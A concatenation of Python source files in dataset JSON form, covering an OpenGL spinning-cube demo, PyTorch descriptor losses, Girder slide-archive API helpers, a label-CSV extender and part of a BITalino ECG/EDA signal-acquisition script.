glesutils.VertexShader(vertex_glsl)\n self.fragment_shader = glesutils.FragmentShader(fragment_glsl)\n\n self.program1 = glesutils.Program(self.vertex_shader, self.fragment_shader)\n self.program1.use()\n\n glClearDepthf(1.0)\n glDepthFunc(GL_LESS)\n glEnable(GL_DEPTH_TEST)\n\n\n glClearColor(0.5, 0.5, 0.5, 1)\n\n self.program1.uniform.light_dir.value = ((0, 1, -1))\n\n self.verteces_buffer = array_spec.create_buffer(vertex_attrib=vertices)\n\n self.elements_face_1 = glesutils.ElementBuffer(indices_face_1)\n self.elements_face_2 = glesutils.ElementBuffer(indices_face_2)\n self.elements_face_3 = glesutils.ElementBuffer(indices_face_3)\n self.elements_face_4 = glesutils.ElementBuffer(indices_face_4)\n\n self.elements_outer = glesutils.ElementBuffer(indices_outer)\n self.elements_points = glesutils.ElementBuffer(indices_points)\n\n self.outer_matrix = transforms.compose(transforms.rotation_degrees(20, \"z\"), \n transforms.rotation_degrees(20, \"y\"), \n transforms.rotation_degrees(20, \"x\"),\n transforms.scaling(1.2))\n\n self.points_matrix = transforms.compose(transforms.stretching(0.1, 1, 1.5),\n transforms.translation(-0.5, -0.5, -0.5))\n\n def on_frame(self, time):\n self.angle = self.angle + time*0.02\n self.redraw()\n\n def draw(self):\n#Draw outer lines\n self.program1.uniform.transform_matrix.value = self.outer_matrix\n 
self.program1.uniform.color.value = (1, 1, 1, 1)\n self.verteces_buffer.draw(elements=self.elements_outer, mode=GL_LINE_STRIP)\n#Draw points\n self.program1.uniform.transform_matrix.value = self.points_matrix\n self.program1.uniform.color.value = (0, 0, 0, 1)\n self.verteces_buffer.draw(elements=self.elements_points, mode=GL_POINTS) \n\n#Draw spinning cube\n rotation_matrix = transforms.compose(transforms.rotation_degrees(self.angle, \"z\"), \n transforms.rotation_degrees(self.angle, \"y\"),\n transforms.compose(transforms.rotation_degrees(self.angle, \"x\")))\n\n self.program1.uniform.transform_matrix.value = rotation_matrix\n self.program1.uniform.color.value = (1, 0, 0, 1)\n self.verteces_buffer.draw(elements=self.elements_face_1, mode=GL_TRIANGLE_STRIP)\n self.program1.uniform.color.value = (0, 1, 0, 1)\n self.verteces_buffer.draw(elements=self.elements_face_2, mode=GL_TRIANGLE_STRIP)\n self.program1.uniform.color.value = (0, 0, 1, 1)\n self.verteces_buffer.draw(elements=self.elements_face_3, mode=GL_TRIANGLE_STRIP)\n self.program1.uniform.color.value = (0, 1, 1, 1)\n self.verteces_buffer.draw(elements=self.elements_face_4, mode=GL_TRIANGLE_STRIP)\n\n\nMyWindow(200, 200, pygame.RESIZABLE).run()", "sub_path": "examples/chapter6-spinning-cube.py", "file_name": "chapter6-spinning-cube.py", "file_ext": "py", "file_size_in_byte": 3964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "rpigl.glesutils.ArraySpec", "line_number": 23, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 23, "usage_type": "name"}, {"api_name": "rpigl.glesutils.GameWindow", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rpigl.glesutils", "line_number": 42, "usage_type": "name"}, {"api_name": "rpigl.glesutils.VertexShader", "line_number": 49, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 49, "usage_type": "name"}, {"api_name": "rpigl.glesutils.FragmentShader", "line_number": 50, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 50, "usage_type": "name"}, {"api_name": "rpigl.glesutils.Program", "line_number": 52, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 52, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 66, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 66, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 67, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 67, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 68, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 68, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 69, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 69, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 71, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 71, "usage_type": "name"}, {"api_name": "rpigl.glesutils.ElementBuffer", "line_number": 72, "usage_type": "call"}, {"api_name": "rpigl.glesutils", "line_number": 72, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 74, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 74, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 74, "usage_type": "call"}, {"api_name": "rpigl.transforms.rotation_degrees", 
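The spinning-cube record builds its transforms with rpigl.transforms.compose over per-axis rotations. As a library-agnostic sketch of the same z-y-x composition in plain numpy (the left-to-right multiplication order, right-most rotation applied first, is an assumption about rpigl's convention):

import numpy as np

def rotation_degrees(angle_deg, axis):
    """4x4 homogeneous rotation about the 'x', 'y' or 'z' axis."""
    a = np.radians(angle_deg)
    c, s = np.cos(a), np.sin(a)
    m = np.eye(4)
    if axis == 'x':
        m[1:3, 1:3] = [[c, -s], [s, c]]
    elif axis == 'y':
        m[0, 0], m[0, 2], m[2, 0], m[2, 2] = c, s, -s, c
    else:  # 'z'
        m[0:2, 0:2] = [[c, -s], [s, c]]
    return m

def compose(*matrices):
    """Multiply left to right, so the right-most rotation is applied first."""
    out = np.eye(4)
    for m in matrices:
        out = out @ m
    return out

outer_matrix = compose(rotation_degrees(20, 'z'),
                       rotation_degrees(20, 'y'),
                       rotation_degrees(20, 'x'))
print(outer_matrix.round(3))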
"line_number": 75, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 76, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 76, "usage_type": "name"}, {"api_name": "rpigl.transforms.scaling", "line_number": 77, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 77, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 79, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 79, "usage_type": "name"}, {"api_name": "rpigl.transforms.stretching", "line_number": 79, "usage_type": "call"}, {"api_name": "rpigl.transforms.translation", "line_number": 80, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 80, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 97, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 97, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 97, "usage_type": "call"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 98, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 98, "usage_type": "name"}, {"api_name": "rpigl.transforms.compose", "line_number": 99, "usage_type": "call"}, {"api_name": "rpigl.transforms", "line_number": 99, "usage_type": "name"}, {"api_name": "rpigl.transforms.rotation_degrees", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.RESIZABLE", "line_number": 112, "usage_type": "attribute"}]} +{"seq_id": "132728321", "text": "import torch\nimport torchvision\nimport numpy as np\nimport cv2\nfrom homography_transform import *\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass CrossEntropyLoss(torch.nn.Module):\n def __init__(self):\n super(CrossEntropyLoss, self).__init__()\n self.criterion = torch.nn.CrossEntropyLoss(reduction='none').cuda()\n def forward(self, inps, labels, masks=None):\n loss = self.criterion(inps, labels)\n if masks is not None:\n loss = loss * masks\n loss = loss.sum()/masks.sum()\n else:\n loss = loss.mean()\n return loss\n\nclass TripletLossWithGridSample(nn.Module):\n def __init__(self, positive_margin=1.0, negative_margin=0.2, lambda_d=250, grid=8):\n super(TripletLossWithGridSample, self).__init__()\n self.positive_margin = positive_margin\n self.negative_margin = negative_margin\n self.lambda_d = lambda_d\n self.grid = grid\n\n def switch_coord(self, points):\n switched = torch.zeros(points.shape)\n switched[:, 1] = points[:, 0]\n switched[:, 0] = points[:, 1]\n return switched\n\n def grid_sample(self, points, descriptors, H, W):\n switched = self.switch_coord(points)\n switched[:, 0] = (switched[:, 0] / (float(W)/2.)) - 1.\n switched[:, 1] = (switched[:, 1] / (float(H)/2.)) - 1.\n switched = switched.view(1, 1, -1, 2).float().cuda()\n sampled_descriptors = F.grid_sample(descriptors, switched, mode='nearest')\n return sampled_descriptors\n\n\n def forward(self, unwarped_descriptors, warped_descriptors, homography):\n Hc, Wc = unwarped_descriptors.shape[2], unwarped_descriptors.shape[3]\n xs, ys = torch.meshgrid(torch.arange(Hc), torch.arange(Wc))\n coord_cells = torch.cat((xs.unsqueeze(2), ys.unsqueeze(2)), dim=2)\n coord_cells = coord_cells * self.grid + self.grid//2\n coord_cells = coord_cells.reshape(Hc*Wc, 2)\n coord_cells = coord_cells.data.numpy().astype('float')\n coord_cells, warped_cells = warp_pairs(coord_cells, homography, Hc*self.grid, Wc*self.grid)\n 
coord_cells = torch.from_numpy(coord_cells)\n warped_cells = torch.from_numpy(warped_cells)\n d1 = self.grid_sample(coord_cells, unwarped_descriptors, Hc*self.grid, Wc*self.grid).cuda()\n d2 = self.grid_sample(warped_cells, warped_descriptors, Hc*self.grid, Wc*self.grid).cuda()\n valid_length = coord_cells.shape[0]\n warped_cells = warped_cells.reshape(valid_length, 1, 2).cuda()\n coord_cells = warped_cells.reshape(1, valid_length, 2).cuda()\n cell_dist = torch.norm(coord_cells-warped_cells, dim=-1)\n s = (cell_dist <= (self.grid-0.5)).float()\n D = d1.shape[1]\n d1 = d1.reshape(D, -1)\n d2 = d2.reshape(D, -1)\n dot_dist = d1.t() @ d2\n #s = torch.eye(dot_dist.shape[0]).cuda().float()\n positive_dist = torch.clamp(self.positive_margin - dot_dist, 0, None)\n negative_dist = torch.clamp(dot_dist - self.negative_margin, 0, None)\n loss = self.lambda_d * s * positive_dist + (1-s) * negative_dist\n normalization = float(valid_length * Hc * Wc)\n loss = loss.sum()/normalization\n\n return loss\n", "sub_path": "losses.py", "file_name": "losses.py", "file_ext": "py", "file_size_in_byte": 3234, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.functional.grid_sample", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.meshgrid", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "52615214", "text": "import girder_client\nfrom PIL import Image\nfrom io import BytesIO\nimport numpy as np\nfrom math import ceil\nfrom imageio import imwrite\nfrom json import dumps\n\nAPI_URLS = dict(\n CB='http://computablebrain.emory.edu:8080/api/v1',\n Transplant='http://transplant.digitalslidearchive.emory.edu:8080/api/v1',\n Candygram='http://candygram.neurology.emory.edu:8080/api/v1'\n)\n\n\ndef get_user_by_id(gc, user_id):\n \"\"\"Get DSA user info from user id.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client\n user_id : str\n DSA id of user\n\n Return\n ------\n user : str\n DSA user information\n\n \"\"\"\n user = gc.get(f'user/{user_id}')\n return user\n\n\ndef login(api_url=None, username=None, password=None, dsa=None):\n \"\"\"Login to a girder client session.\n\n Parameters\n ----------\n api_url : str, optional\n DSA instance to use (hint: url ends with api/v1 most of the time), will be ignored if dsa is not None\n username : str, optional\n if both username and password are given, then client is authenticated non-interactively\n password : str, optional\n if both username 
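The losses.py record above normalizes pixel coordinates into the [-1, 1] range that torch.nn.functional.grid_sample expects. A self-contained CPU sketch of just that step, assuming the input points are already ordered (x, y) rather than (row, col):

import torch
import torch.nn.functional as F

def sample_descriptors(points_xy, descriptors, H, W):
    """Sample a (1, D, Hc, Wc) map at pixel coordinates given as (N, 2) = (x, y).

    grid_sample wants each coordinate in [-1, 1], with x normalized by the
    image width and y by the height -- hence the divide-by-half-and-shift.
    """
    grid = points_xy.clone().float()
    grid[:, 0] = grid[:, 0] / (W / 2.0) - 1.0  # x -> [-1, 1]
    grid[:, 1] = grid[:, 1] / (H / 2.0) - 1.0  # y -> [-1, 1]
    grid = grid.view(1, 1, -1, 2)              # (batch, out_h=1, out_w=N, 2)
    return F.grid_sample(descriptors, grid, mode='nearest', align_corners=False)

descriptors = torch.randn(1, 64, 30, 40)               # coarse Hc x Wc map
points = torch.tensor([[16.0, 24.0], [200.0, 100.0]])  # (x, y) in pixels
print(sample_descriptors(points, descriptors, H=240, W=320).shape)  # (1, 64, 1, 2)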
and password are given, then client is authenticated non-interactively\n dsa : str, optional\n alternative to the api_url parameters, pass in CB for computablebrain, Transplant for transplant, candygram for\n candygram\n\n Returns\n -------\n gc : girder_client.GirderClient\n authenticated instance\n\n \"\"\"\n if dsa is not None:\n try:\n api_url = API_URLS[dsa]\n except KeyError:\n raise Exception('dsa key not found: {}'.format(dsa))\n elif api_url is None:\n raise Exception(\"api_url and dsa parameters can't both be None\")\n\n gc = girder_client.GirderClient(apiUrl=api_url)\n\n if username is not None and password is not None:\n gc.authenticate(username=username, password=password)\n else:\n gc.authenticate(interactive=True)\n return gc\n\n\ndef get_item_image(gc, item_id, image_type, width=256, return_type='PIL'):\n \"\"\"Get an associated image for a large image compatible item (thumbnail, label, macro)\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n instance of girder client\n item_id : str\n item id\n image_type : str\n the associated image to get, options include thumbnail, label, macro\n width : int (optional)\n the width of the returned image, the height will be adjusted to keep the original aspect ratio\n return_type : str (optional)\n return type of the image, either 'PIL' or 'Array' for numpy array\n\n Return\n ------\n image : PIL image\n RGB image\n\n \"\"\"\n url = 'item/{}/tiles/images/{}?width={}&encoding=JPEG'\n\n content = gc.get(url.format(item_id, image_type, width), jsonResp=False).content\n image = Image.open(BytesIO(content))\n\n if return_type == 'Array':\n image = np.array(image)\n elif return_type != 'PIL':\n print('could not recognize return_type {}, returning in PIL format'.format(return_type))\n return image\n\n\ndef get_recursive_items(gc, parent_id, parent_type='folder'):\n \"\"\"Get all items under a folder or collection, recursively. Note that this will not work for virtual folders.\n\n Parameters\n ---------\n gc: girder_client.GirderClient\n an authenticated girder client session\n parent_id: str\n DSA id for parent folder to recursively search for items\n parent_type: str (Default: 'folder')\n set to 'collection' if the parent_id is a collection\n\n Returns\n -------\n items : list\n DSA items found under parent folder/collection\n\n \"\"\"\n items = gc.get('resource/{}/items?type={}&limit=0&sort=_id&sortdir=1'.format(parent_id, parent_type))\n return items\n\n\ndef get_region_im(gc, item_id, region):\n \"\"\"Get a region of a DSA WSI image item as a numpy array. You can get a thumbnail of the image by not specifying\n left, top, bottom, or right in the region parameters but providing a magnification parameter.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client\n item_id : str\n item id\n region : dict\n {'left': int, 'right': int, 'bottom': int, 'top': int, 'width': int, 'height': int, 'magnification' float or\n int}. You only need to give width and height OR right and bottom. If all four are given the right and bottom\n will be ignored and a new right and bottom will obtained from left + width and top + height. 
If magnification\n is not given the native magnification will be used.\n\n Return\n ------\n im : numpy.ndarray\n RGB(A) region image\n\n \"\"\"\n # if width and height is given then get the right and bottom coordinates\n if 'width' in region and 'height' in region:\n region['right'] = region['left'] + region['width']\n region['bottom'] = region['top'] + region['height']\n\n if 'magnification' not in region:\n region['magnification'] = gc.get('item/{}/tiles'.format(item_id))['magnification']\n\n if 'right' not in region and 'left' not in region and 'top' not in region and 'bottom' not in region:\n url = 'item/{}/tiles/region?units=base_pixels&magnification={}&exact=false&encoding=PNG&jpegQuality=' \\\n '100&jpegSubsampling=0'\n content = gc.get(url.format(item_id, region['magnification']), jsonResp=False).content\n else:\n url = 'item/{}/tiles/region?left={}&top={}&right={}&bottom={}&units=base_pixels&magnification={}' + \\\n '&exact=false&encoding=PNG&jpegQuality=100&jpegSubsampling=0'\n content = gc.get(url.format(item_id, region['left'], region['top'], region['right'], region['bottom'],\n region['magnification']), jsonResp=False).content\n image = np.array(Image.open(BytesIO(content)))\n return image\n\n\ndef image_items_mosaic(gc, items, n_cols=6, im_size=(256, 256), save_path=None):\n \"\"\"Given a list of image item information, either a list of item ids or a list of item dicts, get thumbnails for\n each image and concatentate them into a mosaic of images. The images are all grabbed at the same resolution and\n are padded with white pixels to keep the aspect ratio of original image. The number of rows images is determined\n by the n_cols parameters.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client if working with private images\n items : list\n list of item ids or list of items dicts, both will work\n n_cols : int (optional)\n number of images in each row, will determine how many rows the mosaic will have\n im_size : tuple (optional)\n size of each image, padded with white to preserve aspect ratio\n save_path : str (optional)\n file path with filename used to save the mosaic image to, as PNG or similar format\n\n Return\n ------\n mosaic : np.ndarray\n mosaic image in RGB form (alpha channel will not be maintained)\n\n \"\"\"\n # save n_cols images accros, get the number of rows needed\n n_rows = ceil(len(items) / n_cols)\n\n # create the mosaic array\n mosaic = np.zeros((im_size[0] * n_rows, im_size[1] * n_cols, 3), dtype=np.uint8)\n\n for i, item in enumerate(items):\n # get the thumbnail - pad with white space to conserve apsect ratio\n try:\n content = gc.get('item/{}/tiles/thumbnail?width={}&height={}&fill=%23FFFFFF&encoding=PNG'.format(\n item['_id'], im_size[0], im_size[1]), jsonResp=False).content\n except:\n content = gc.get('item/{}/tiles/thumbnail?width={}&height={}&fill=%23FFFFFF&encoding=PNG'.format(\n item, im_size[0], im_size[1]), jsonResp=False).content\n image = np.array(Image.open(BytesIO(content)))[:, :, :3]\n\n # find location to put image into mosaic array\n mosaic[\n int(i / n_cols) * im_size[0]:int(i / n_cols) * im_size[0] + im_size[0],\n (i % n_cols) * im_size[0]:(i % n_cols) * im_size[0] + im_size[0], :] = image\n\n if save_path is not None:\n # save the image\n imwrite(save_path, mosaic)\n return mosaic\n\n\ndef get_collection_id(gc, collection_name):\n \"\"\"Get the id of a collection by name.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client for private collections\n collection_name : 
str\n name of collection\n\n Return\n ------\n collection_id : str\n id of the collection, returns None if no collections with given name\n\n \"\"\"\n item_id = None\n for collection in gc.listCollection():\n if collection['name'] == collection_name:\n item_id = collection['_id']\n break\n return item_id\n\n\ndef create_virtual_folder(gc, source_collection_name, target_fld_id, metadata_key):\n \"\"\"Create a virtual folder using single metadata key.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client\n source_collection_name : str\n name of collection to use as source, all items in this collection will be searched to populate the virtual folder\n target_fld_id : str\n id of the virtual folder, must be previously created\n metadata_key : str\n metadata key to use to populate the virtual folder\n\n Return\n ------\n fld_ids : list\n list of created virtual folders\n\n \"\"\"\n # unique values for metadata in source collection\n unique_values = set()\n collection_id = get_collection_id(gc, source_collection_name)\n for item in get_recursive_items(gc, collection_id, parent_type='collection'):\n if 'meta' in item:\n meta = item['meta']\n if metadata_key in meta:\n unique_values.add(meta[metadata_key])\n\n fld_ids = []\n for value in unique_values:\n # set parameters for virtual folder post for this value folder\n params = {\"parentType\": \"folder\", \"parentId\": target_fld_id, \"reuseExisting\": True, \"name\": value,\n \"isVirtual\": True,\n \"virtualItemsQuery\": dumps(\n {\"meta.{}\".format(metadata_key): value, 'baseParentId': {\"$oid\": collection_id}})}\n\n # post the new virtual folder\n fld_ids.append(gc.post(\"folder\", parameters=params)['_id'])\n\n return fld_ids\n", "sub_path": "modules/girder_utils.py", "file_name": "girder_utils.py", "file_ext": "py", "file_size_in_byte": 10340, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "girder_client.GirderClient", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 99, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 99, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 169, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 169, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 169, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 212, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 212, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 212, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 212, "usage_type": "call"}, {"api_name": "imageio.imwrite", "line_number": 221, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 283, "usage_type": "call"}]} +{"seq_id": "486894562", "text": "from skimage import io\nimport os\nimport csv\n\nTRAIN_DIR = \"/cluster/academic/CSCI481/fluke_net/kaggle_dataset/train\"\nALL_LABELS_CSV = \"all_train_labels\"\n\nwith open(ALL_LABELS_CSV + \".csv\", newline='') as orig_f:\n orig = csv.DictReader(orig_f)\n 
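A hypothetical round-trip with the girder helpers defined above; the server URL, credentials, and item id are placeholders, not real endpoints:

gc = login(api_url='https://example.org/api/v1', username='me', password='secret')
thumbnail = get_item_image(gc, item_id='0123456789abcdef01234567',
                           image_type='thumbnail', width=512, return_type='Array')
region = get_region_im(gc, item_id='0123456789abcdef01234567',
                       region={'left': 0, 'top': 0, 'width': 1024,
                               'height': 1024, 'magnification': 20})
print(thumbnail.shape, region.shape)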
fieldnames = orig.fieldnames\n fieldnames.append(\"BW\")\n fieldnames.append(\"W\")\n fieldnames.append(\"H\")\n fieldnames.append(\"AR\")\n with open(ALL_LABELS_CSV + \"_extended.csv\", \"w\", newline='') as out_f:\n out = csv.DictWriter(out_f, fieldnames=fieldnames)\n out.writeheader()\n for row in orig:\n img_path = row['Image']\n image = io.imread(os.path.join(TRAIN_DIR, img_path))\n row[\"BW\"] = (len(image.shape) == 2)\n row[\"W\"] = image.shape[1]\n row[\"H\"] = image.shape[0]\n row[\"AR\"] = float(row[\"W\"])/row[\"H\"]\n out.writerow(row)\n", "sub_path": "label_files/extend_labels.py", "file_name": "extend_labels.py", "file_ext": "py", "file_size_in_byte": 879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "csv.DictReader", "line_number": 9, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 20, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "197529772", "text": "from local_bitalino import BITalino\nimport time,datetime\nimport numpy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport biosppy as bs # maybe not used!\n\nimport scipy.io as sio\nfrom scipy import signal\nimport scipy\n\nfrom socket import socket\nimport peakutils\nimport configparser\nimport getopt\nimport sys,os\nimport math\nimport json\n\n\n\nWEB_HOST_ADDRESS = \"\"\nWEB_PORT = 1234\nplot = True\nsend_flag = True\nsave_raw_data = True\n\nlowcut = 30\nhighcut = 200\n\nlabels = [\"'nSeq'\", \"'I1'\", \"'I2'\", \"'O1'\", \"'O2'\", \"'A1'\", \"'A2'\", \"'A3'\", \"'A4'\", \"'A5'\", \"'A6'\"]\n\n# initial settings - default settings\nmacAddress = '20:16:12:22:01:28'\nrunning_time = 30\nbatteryThreshold = 30\nacqChannels = [0,1] # 1 for A2 | 0 - A1\nsamplingRate = 1000\nnSamples = 100\ndigitalOutput =[1,1]\n\n\ndef tostring(data):\n \"\"\"\n :param data: object to be converted into a JSON-compatible `str`\n :type data: any\n :return: JSON-compatible `str` version of `data`\n\n Converts `data` from its native data type to a JSON-compatible `str`.\n \"\"\"\n dtype = type(data).__name__\n if dtype == 'ndarray':\n if numpy.shape(data) != ():\n data = data.tolist() # data=list(data)\n else:\n data = '\"' + data.tostring() + '\"'\n elif dtype == 'dict' or dtype == 'tuple':\n try:\n data = json.dumps(data)\n except:\n pass\n elif dtype == 'NoneType':\n data = ''\n elif dtype == 'str' or dtype == 'unicode':\n data = json.dumps(data)\n\n return str(data)\n\ndef send_to_server(data_as_json):\n '''\n function to send the data to the websocket.\n :param data_as_json:\n :return:\n '''\n #instantiate a socket\n sock = socket()\n\n #connect to the socket\n sock.connect((WEB_HOST_ADDRESS,int(WEB_PORT)))\n\n # send the data as a json\n sock.send(data_as_json.encode('utf-8'))\n\n # close the connection.\n sock.close()\n\ndef butter_bandpass(lowcut, highcut, fs, order=1):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = signal.butter(order, [low, high], btype='band')\n return b, a\n\ndef butter_highpass(cutoff, fs, order=1):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = signal.butter(order, normal_cutoff, btype='high', analog=False)\n return b, a\n\ndef getpeak(ecg, time):\n '''detects the peak from the 
array!'''\n if(len(ecg) < 500):\n return [0]\n else:\n indexes = peakutils.indexes(ecg, thres=0.8 , min_dist=2)\n return indexes\n\n\ndef get_time_domain_features(ecg,peaklist,fs):\n '''\n\n :param ecg: our filtered signal\n :param peaklist: array of indexes which gives th peak\n :param fs: sampling frequency\n :return: ??\n '''\n RR_list = []\n cnt = 0\n while (cnt < (len(peaklist) - 1)):\n RR_interval = (peaklist[cnt + 1] - peaklist[cnt]) # Calculate distance between beats in # of samples\n s_dist = (RR_interval / fs)\n RR_list.append(s_dist) # Append to list\n cnt += 1\n\n hr = 60 / np.mean(RR_list) * 0.1 # 60sec (1 minute) / average R-R interval of signal * (new sample arrives).\n\n\n return hr\n\n\ndef eda_bin_to_microsiemens(eda):\n '''\n Vcc = battery voltage = 3.7 V | Sensor_gain = 1100\n RMOhm = 1 - EDAB / 2^n (sensor resistance in mega ohms)\n EDAS = 1 / RMOhm (conductance in microsiemens)\n Reference : http://forum.bitalino.com/viewtopic.php?f=12&t=128\n\n :param eda: eda array\n :return:\n '''\n # convert binary data to micro siemens\n eda_value_microsiemens = []\n for j in range(0, len(eda)):\n r = 1 - (eda[j] / 1023)\n eda_mSiemens = 1 / r\n eda_value_microsiemens.append(eda_mSiemens)\n\n return eda_value_microsiemens\n\ndef ecg_bin_to_millivolts(ecg):\n '''\n Vcc = battery voltage = 3.7 V | Sensor_gain = 1100\n RMOhm = 1 - EDAB / 2^n (sensor resistance in mega ohms)\n EDAS = 1 / RMOhm (conductance in microsiemens)\n Reference : http://forum.bitalino.com/viewtopic.php?f=12&t=128\n\n :param eda: eda array\n :return:\n '''\n\n ecg_value_millivolts = []\n for i in range(0, len(ecg)):\n x = ecg[i]/1024 - (0.5) * 3.3\n x = x/1100\n x = x * 1000\n ecg_value_millivolts.append(x)\n\n return ecg_value_millivolts\n\n\ndef eda_process(eda):\n pass\n\n\ndef write_to_file(filename,raw_data):\n with open(filename, 'ab') as f:\n for line in raw_data:\n a = numpy.array(line)\n np.savetxt(f, a.reshape(1, a.shape[0]) , delimiter=',' ,fmt=\"%5f\")\n\ndef bitalino_data_collection():\n '''\n The core function of the file.\n :return:\n '''\n\n Fs = float(int(samplingRate))\n\n szplot = 500 # to show the plot (show for last) # our window size!\n\n # Connect to BITalino\n device = BITalino(macAddress)\n print(\"device connected to bitalino\")\n\n # Set battery threshold\n device.battery(batteryThreshold)\n\n\n # Start Acquisition\n device.start(samplingRate, acqChannels)\n\n\n # time initialization\n timeend = 0.0\n timeinit = 0.0 # initial time\n timeend += float(nSamples) / float(samplingRate) # end time ( in our case its 100/1000 = 0.1 sec)\n time_elapsed = []\n\n ecg = []\n eda = []\n peakind = [] # for peak detection\n\n ecg_data = []\n eda_data = []\n\n\n # plotting\n if(plot) :\n fig = plt.figure(figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n ax = fig.add_subplot(111)\n\n plt.ion()\n plt.xlabel('Time (seconds)')\n line0, = ax.plot(time_elapsed, ecg_data, 'y-', label='RAW data') # raw data\n line1, = ax.plot(time_elapsed, ecg, 'b-' , alpha=0.3, label='detrended RAW data') # raw data\n line2, = ax.plot(time_elapsed, ecg, 'g-', alpha=0.7 ,label='filtered data') # to represent teh filtered data\n line3, = ax.plot(time_elapsed, ecg, 'ro' , label='detected peak') # peaks\n fig.show()\n fig.canvas.draw()\n\n\n fig1 = plt.figure(figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n ax_eda = fig1.add_subplot(111)\n plt.ion()\n plt.xlabel('Time (seconds)')\n plt.ylabel('Conductance (microSiemens)')\n line, = ax_eda.plot(time_elapsed, eda, 'r-' , label='eda RAW') # peaks\n lineeda1, = 
